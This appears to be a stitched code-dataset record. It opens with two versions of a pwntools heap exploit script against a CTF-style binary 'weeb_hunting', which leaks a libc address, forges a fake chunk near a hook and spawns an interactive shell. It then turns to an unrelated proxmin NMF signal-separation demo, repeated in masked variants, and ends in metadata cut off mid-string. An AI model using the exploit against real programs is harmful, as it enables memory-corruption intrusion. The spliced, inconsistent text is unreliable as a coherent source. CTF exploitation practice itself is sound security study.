"step-4": "from pwn import *\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-5": "from pwn import *\n\np = process(\"./weeb_hunting\")\n\nelf = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\npwnlib.gdb.attach(p)\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"\\n\")\np.send(\"\\n\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"1\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('\\x41\\x22\\x60')\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\n\nr = p.recv()\nwhile \"You found a sword\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\n__srandom = u64((r.split(\"1. \")[1].split(\"\\n\")[0] + \"\\x00\"*8)[:8])\nlog.info(hex(__srandom))\n\nhook = __srandom + 0x38A21D\n\nlog.info(\"Fake chunk: \" + hex(hook))\n\np.sendline(\"2\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(p64(hook)[:6])\n\np.interactive()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
<|reserved_special_token_0|>
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
def generateAmplitudes(k):
"""Makes mixing coefficients"""
res = np.array([np.random.random() for i in range(k)])
return res / res.sum()
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logging.basicConfig()
logger = logging.getLogger('proxmin')
logger.setLevel(logging.INFO)
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
def generateAmplitudes(k):
"""Makes mixing coefficients"""
res = np.array([np.random.random() for i in range(k)])
return res / res.sum()
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
if __name__ == '__main__':
n = 50
k = 3
b = 100
noise = 0.02
np.random.seed(101)
trueA = np.array([generateAmplitudes(k) for i in range(b)])
trueS = np.array([generateComponent(n) for i in range(k)])
trueY = np.dot(trueA, trueS)
Y = add_noise(trueY, noise)
W = None
A = np.array([generateAmplitudes(k) for i in range(b)])
S = np.array([generateComponent(n) for i in range(k)])
p1 = partial(po.prox_unity_plus, axis=1)
proxs_g = [[p1], None]
tr = Traceback(2)
nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,
traceback=tr)
A, S = match(A, S, trueS)
fig = plt.figure(figsize=(6, 7))
ax = fig.add_subplot(311)
ax.set_title('True Components S')
ax.plot(trueS.T)
ax2 = fig.add_subplot(312)
ax2.set_title('Data Y')
ax2.plot(Y.T)
ax3 = fig.add_subplot(313)
ax3.set_title('Found Components S')
ax3.set_xlabel('Pixel')
ax3.plot(S.T)
fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)
fig.show()
convergences = []
As = tr['X', 0]
Ss = tr['X', 1]
for it in range(tr.it):
Y = np.dot(As[it], Ss[it])
convergences.append(((Y - trueY) ** 2).sum())
fig2 = plt.figure(figsize=(6, 4))
ax4 = fig2.add_subplot(111)
ax4.set_title('Convergence')
ax4.semilogy(convergences)
ax4.set_ylabel('$||Y-AS||^2$')
ax4.set_xlabel('Iterations')
fig2.show()
"""
# noise plot
#noises = np.linspace(0,0.05,21)
#repeat = 10
noises = [noise]
repeat = 1000
A_chi_squared = np.empty((len(noises), repeat))
S_chi_squared = np.empty((len(noises), repeat))
for i in range(len(noises)):
e = noises[i]
for r in range(repeat):
Y = add_noise(trueY, e)
A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )
A, S = match(A, S, trueS)
A_chi_squared[i,r] = np.sum((A - trueA)**2)
S_chi_squared[i,r] = np.sum((S - trueS)**2)
fig3 = plt.figure(figsize=(6,4))
ax5 = fig3.add_subplot(111)
dof_A = A.shape[0]*A.shape[1]
dof_S = S.shape[0]*S.shape[1]
ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label="$\\chi^2_S$ / DOF")
ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label="$\\chi^2_A$ / DOF")
ax5.legend()
ax5.set_ylabel("Chi-squared")
ax5.set_xlabel("Standard deviation of noise")
fig3.show()
"""
<|reserved_special_token_1|>
from proxmin import nmf
from proxmin.utils import Traceback
from proxmin import operators as po
from scipy.optimize import linear_sum_assignment
import numpy as np
import matplotlib.pyplot as plt
import time
from functools import partial
import logging
logging.basicConfig()
logger = logging.getLogger('proxmin')
logger.setLevel(logging.INFO)
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
def generateAmplitudes(k):
"""Makes mixing coefficients"""
res = np.array([np.random.random() for i in range(k)])
return res / res.sum()
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
if __name__ == '__main__':
n = 50
k = 3
b = 100
noise = 0.02
np.random.seed(101)
trueA = np.array([generateAmplitudes(k) for i in range(b)])
trueS = np.array([generateComponent(n) for i in range(k)])
trueY = np.dot(trueA, trueS)
Y = add_noise(trueY, noise)
W = None
A = np.array([generateAmplitudes(k) for i in range(b)])
S = np.array([generateComponent(n) for i in range(k)])
p1 = partial(po.prox_unity_plus, axis=1)
proxs_g = [[p1], None]
tr = Traceback(2)
nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,
traceback=tr)
A, S = match(A, S, trueS)
fig = plt.figure(figsize=(6, 7))
ax = fig.add_subplot(311)
ax.set_title('True Components S')
ax.plot(trueS.T)
ax2 = fig.add_subplot(312)
ax2.set_title('Data Y')
ax2.plot(Y.T)
ax3 = fig.add_subplot(313)
ax3.set_title('Found Components S')
ax3.set_xlabel('Pixel')
ax3.plot(S.T)
fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)
fig.show()
convergences = []
As = tr['X', 0]
Ss = tr['X', 1]
for it in range(tr.it):
Y = np.dot(As[it], Ss[it])
convergences.append(((Y - trueY) ** 2).sum())
fig2 = plt.figure(figsize=(6, 4))
ax4 = fig2.add_subplot(111)
ax4.set_title('Convergence')
ax4.semilogy(convergences)
ax4.set_ylabel('$||Y-AS||^2$')
ax4.set_xlabel('Iterations')
fig2.show()
"""
# noise plot
#noises = np.linspace(0,0.05,21)
#repeat = 10
noises = [noise]
repeat = 1000
A_chi_squared = np.empty((len(noises), repeat))
S_chi_squared = np.empty((len(noises), repeat))
for i in range(len(noises)):
e = noises[i]
for r in range(repeat):
Y = add_noise(trueY, e)
A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )
A, S = match(A, S, trueS)
A_chi_squared[i,r] = np.sum((A - trueA)**2)
S_chi_squared[i,r] = np.sum((S - trueS)**2)
fig3 = plt.figure(figsize=(6,4))
ax5 = fig3.add_subplot(111)
dof_A = A.shape[0]*A.shape[1]
dof_S = S.shape[0]*S.shape[1]
ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label="$\\chi^2_S$ / DOF")
ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label="$\\chi^2_A$ / DOF")
ax5.legend()
ax5.set_ylabel("Chi-squared")
ax5.set_xlabel("Standard deviation of noise")
fig3.show()
"""
<|reserved_special_token_1|>
from proxmin import nmf
from proxmin.utils import Traceback
from proxmin import operators as po
from scipy.optimize import linear_sum_assignment
import numpy as np
import matplotlib.pyplot as plt
import time
from functools import partial
# initialize and run NMF
import logging
logging.basicConfig()
logger = logging.getLogger('proxmin')
logger.setLevel(logging.INFO)
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25*np.random.random()
phase = 2*np.pi*np.random.random()
x = np.arange(m)
return np.cos(x/freq-phase)**2
def generateAmplitudes(k):
"""Makes mixing coefficients"""
res = np.array([np.random.random() for i in range(k)])
return res/res.sum()
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k,k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j]/np.sqrt(cov[i + k][i + k]*cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
if __name__ == "__main__":
n = 50 # component resolution
k = 3 # number of components
b = 100 # number of observations
noise = 0.02 # stdev of added noise
np.random.seed(101)
# set up test data
trueA = np.array([generateAmplitudes(k) for i in range(b)])
trueS = np.array([generateComponent(n) for i in range(k)])
trueY = np.dot(trueA,trueS)
Y = add_noise(trueY, noise)
# if noise is variable, specify variance matrix of the same shape as Y
W = None
A = np.array([generateAmplitudes(k) for i in range(b)])
S = np.array([generateComponent(n) for i in range(k)])
p1 = partial(po.prox_unity_plus, axis=1)
proxs_g=[[p1], None]
tr = Traceback(2)
nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-6, e_abs=1e-6/noise**2, traceback=tr)
# sort components to best match inputs
A, S = match(A, S, trueS)
# show data and model
fig = plt.figure(figsize=(6,7))
ax = fig.add_subplot(311)
ax.set_title("True Components S")
ax.plot(trueS.T)
ax2 = fig.add_subplot(312)
ax2.set_title("Data Y")
ax2.plot(Y.T)
ax3 = fig.add_subplot(313)
ax3.set_title("Found Components S")
ax3.set_xlabel("Pixel")
ax3.plot(S.T)
fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)
fig.show()
# convergence plot from traceback
convergences = []
As = tr['X',0]
Ss = tr['X',1]
for it in range(tr.it):
Y = np.dot(As[it], Ss[it])
convergences.append(((Y - trueY)**2).sum())
fig2 = plt.figure(figsize=(6,4))
ax4 = fig2.add_subplot(111)
ax4.set_title("Convergence")
ax4.semilogy(convergences)
ax4.set_ylabel("$||Y-AS||^2$")
ax4.set_xlabel("Iterations")
fig2.show()
"""
# noise plot
#noises = np.linspace(0,0.05,21)
#repeat = 10
noises = [noise]
repeat = 1000
A_chi_squared = np.empty((len(noises), repeat))
S_chi_squared = np.empty((len(noises), repeat))
for i in range(len(noises)):
e = noises[i]
for r in range(repeat):
Y = add_noise(trueY, e)
A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )
A, S = match(A, S, trueS)
A_chi_squared[i,r] = np.sum((A - trueA)**2)
S_chi_squared[i,r] = np.sum((S - trueS)**2)
fig3 = plt.figure(figsize=(6,4))
ax5 = fig3.add_subplot(111)
dof_A = A.shape[0]*A.shape[1]
dof_S = S.shape[0]*S.shape[1]
ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label="$\chi^2_S$ / DOF")
ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label="$\chi^2_A$ / DOF")
ax5.legend()
ax5.set_ylabel("Chi-squared")
ax5.set_xlabel("Standard deviation of noise")
fig3.show()
"""
|
flexible
|
{
"blob_id": "0edc0c2f86bda0122d4b231eed700d7a5b08ec1e",
"index": 8279,
"step-1": "<mask token>\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\n<mask token>\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\ndef generateAmplitudes(k):\n \"\"\"Makes mixing coefficients\"\"\"\n res = np.array([np.random.random() for i in range(k)])\n return res / res.sum()\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogging.basicConfig()\nlogger = logging.getLogger('proxmin')\nlogger.setLevel(logging.INFO)\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\ndef generateAmplitudes(k):\n \"\"\"Makes mixing coefficients\"\"\"\n res = np.array([np.random.random() for i in range(k)])\n return res / res.sum()\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\nif __name__ == '__main__':\n n = 50\n k = 3\n b = 100\n noise = 0.02\n np.random.seed(101)\n trueA = np.array([generateAmplitudes(k) for i in range(b)])\n trueS = np.array([generateComponent(n) for i in range(k)])\n trueY = np.dot(trueA, trueS)\n Y = add_noise(trueY, noise)\n W = None\n A = np.array([generateAmplitudes(k) for i in range(b)])\n S = np.array([generateComponent(n) for i in range(k)])\n p1 = partial(po.prox_unity_plus, axis=1)\n proxs_g = [[p1], None]\n tr = Traceback(2)\n nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,\n traceback=tr)\n A, S = match(A, S, trueS)\n fig = plt.figure(figsize=(6, 7))\n ax = fig.add_subplot(311)\n ax.set_title('True Components S')\n ax.plot(trueS.T)\n ax2 = fig.add_subplot(312)\n ax2.set_title('Data Y')\n ax2.plot(Y.T)\n ax3 = fig.add_subplot(313)\n ax3.set_title('Found Components S')\n ax3.set_xlabel('Pixel')\n ax3.plot(S.T)\n fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)\n fig.show()\n convergences = []\n As = tr['X', 0]\n Ss = tr['X', 1]\n for it in range(tr.it):\n Y = np.dot(As[it], Ss[it])\n convergences.append(((Y - trueY) ** 2).sum())\n fig2 = plt.figure(figsize=(6, 4))\n ax4 = fig2.add_subplot(111)\n ax4.set_title('Convergence')\n ax4.semilogy(convergences)\n ax4.set_ylabel('$||Y-AS||^2$')\n ax4.set_xlabel('Iterations')\n fig2.show()\n \"\"\"\n # noise plot\n #noises = np.linspace(0,0.05,21)\n #repeat = 10\n noises = [noise]\n repeat = 1000\n A_chi_squared = np.empty((len(noises), repeat))\n S_chi_squared = np.empty((len(noises), repeat))\n for i in range(len(noises)):\n e = noises[i]\n for r in range(repeat):\n Y = add_noise(trueY, e)\n A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )\n A, S = match(A, S, trueS)\n A_chi_squared[i,r] = np.sum((A - trueA)**2)\n S_chi_squared[i,r] = np.sum((S - trueS)**2)\n fig3 = plt.figure(figsize=(6,4))\n ax5 = fig3.add_subplot(111)\n dof_A = A.shape[0]*A.shape[1]\n dof_S = S.shape[0]*S.shape[1]\n ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label=\"$\\\\chi^2_S$ / DOF\")\n ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label=\"$\\\\chi^2_A$ / DOF\")\n ax5.legend()\n ax5.set_ylabel(\"Chi-squared\")\n ax5.set_xlabel(\"Standard deviation of noise\")\n fig3.show()\n \"\"\"\n",
"step-4": "from proxmin import nmf\nfrom proxmin.utils import Traceback\nfrom proxmin import operators as po\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nfrom functools import partial\nimport logging\nlogging.basicConfig()\nlogger = logging.getLogger('proxmin')\nlogger.setLevel(logging.INFO)\n\n\ndef generateComponent(m):\n \"\"\"Creates oscillating components to be mixed\"\"\"\n freq = 25 * np.random.random()\n phase = 2 * np.pi * np.random.random()\n x = np.arange(m)\n return np.cos(x / freq - phase) ** 2\n\n\ndef generateAmplitudes(k):\n \"\"\"Makes mixing coefficients\"\"\"\n res = np.array([np.random.random() for i in range(k)])\n return res / res.sum()\n\n\ndef add_noise(Y, sigma):\n \"\"\"Adds noise to Y\"\"\"\n return Y + np.random.normal(0, sigma, Y.shape)\n\n\ndef match(A, S, trueS):\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\n cov = np.cov(trueS, S)\n k = S.shape[0]\n corr = np.zeros([k, k])\n for i in range(k):\n for j in range(k):\n corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])\n arrangement = linear_sum_assignment(-corr)\n resS = np.zeros_like(S)\n resAT = np.zeros_like(A.T)\n for t in range(k):\n resS[arrangement[1][t]] = S[arrangement[0][t]]\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\n return resAT.T, resS\n\n\nif __name__ == '__main__':\n n = 50\n k = 3\n b = 100\n noise = 0.02\n np.random.seed(101)\n trueA = np.array([generateAmplitudes(k) for i in range(b)])\n trueS = np.array([generateComponent(n) for i in range(k)])\n trueY = np.dot(trueA, trueS)\n Y = add_noise(trueY, noise)\n W = None\n A = np.array([generateAmplitudes(k) for i in range(b)])\n S = np.array([generateComponent(n) for i in range(k)])\n p1 = partial(po.prox_unity_plus, axis=1)\n proxs_g = [[p1], None]\n tr = Traceback(2)\n nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,\n traceback=tr)\n A, S = match(A, S, trueS)\n fig = plt.figure(figsize=(6, 7))\n ax = fig.add_subplot(311)\n ax.set_title('True Components S')\n ax.plot(trueS.T)\n ax2 = fig.add_subplot(312)\n ax2.set_title('Data Y')\n ax2.plot(Y.T)\n ax3 = fig.add_subplot(313)\n ax3.set_title('Found Components S')\n ax3.set_xlabel('Pixel')\n ax3.plot(S.T)\n fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)\n fig.show()\n convergences = []\n As = tr['X', 0]\n Ss = tr['X', 1]\n for it in range(tr.it):\n Y = np.dot(As[it], Ss[it])\n convergences.append(((Y - trueY) ** 2).sum())\n fig2 = plt.figure(figsize=(6, 4))\n ax4 = fig2.add_subplot(111)\n ax4.set_title('Convergence')\n ax4.semilogy(convergences)\n ax4.set_ylabel('$||Y-AS||^2$')\n ax4.set_xlabel('Iterations')\n fig2.show()\n \"\"\"\n # noise plot\n #noises = np.linspace(0,0.05,21)\n #repeat = 10\n noises = [noise]\n repeat = 1000\n A_chi_squared = np.empty((len(noises), repeat))\n S_chi_squared = np.empty((len(noises), repeat))\n for i in range(len(noises)):\n e = noises[i]\n for r in range(repeat):\n Y = add_noise(trueY, e)\n A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )\n A, S = match(A, S, trueS)\n A_chi_squared[i,r] = np.sum((A - trueA)**2)\n S_chi_squared[i,r] = np.sum((S - trueS)**2)\n fig3 = plt.figure(figsize=(6,4))\n ax5 = fig3.add_subplot(111)\n dof_A = A.shape[0]*A.shape[1]\n dof_S = S.shape[0]*S.shape[1]\n ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label=\"$\\\\chi^2_S$ / DOF\")\n ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label=\"$\\\\chi^2_A$ / DOF\")\n ax5.legend()\n ax5.set_ylabel(\"Chi-squared\")\n ax5.set_xlabel(\"Standard deviation of noise\")\n fig3.show()\n \"\"\"\n",
"step-5": "from proxmin import nmf\r\nfrom proxmin.utils import Traceback\r\nfrom proxmin import operators as po\r\nfrom scipy.optimize import linear_sum_assignment\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom functools import partial\r\n\r\n# initialize and run NMF\r\nimport logging\r\nlogging.basicConfig()\r\nlogger = logging.getLogger('proxmin')\r\nlogger.setLevel(logging.INFO)\r\n\r\ndef generateComponent(m):\r\n \"\"\"Creates oscillating components to be mixed\"\"\"\r\n freq = 25*np.random.random()\r\n phase = 2*np.pi*np.random.random()\r\n x = np.arange(m)\r\n return np.cos(x/freq-phase)**2\r\n\r\ndef generateAmplitudes(k):\r\n \"\"\"Makes mixing coefficients\"\"\"\r\n res = np.array([np.random.random() for i in range(k)])\r\n return res/res.sum()\r\n\r\ndef add_noise(Y, sigma):\r\n \"\"\"Adds noise to Y\"\"\"\r\n return Y + np.random.normal(0, sigma, Y.shape)\r\n\r\ndef match(A, S, trueS):\r\n \"\"\"Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)\"\"\"\r\n cov = np.cov(trueS, S)\r\n k = S.shape[0]\r\n corr = np.zeros([k,k])\r\n for i in range(k):\r\n for j in range(k):\r\n corr[i][j] = cov[i + k][j]/np.sqrt(cov[i + k][i + k]*cov[j][j])\r\n arrangement = linear_sum_assignment(-corr)\r\n resS = 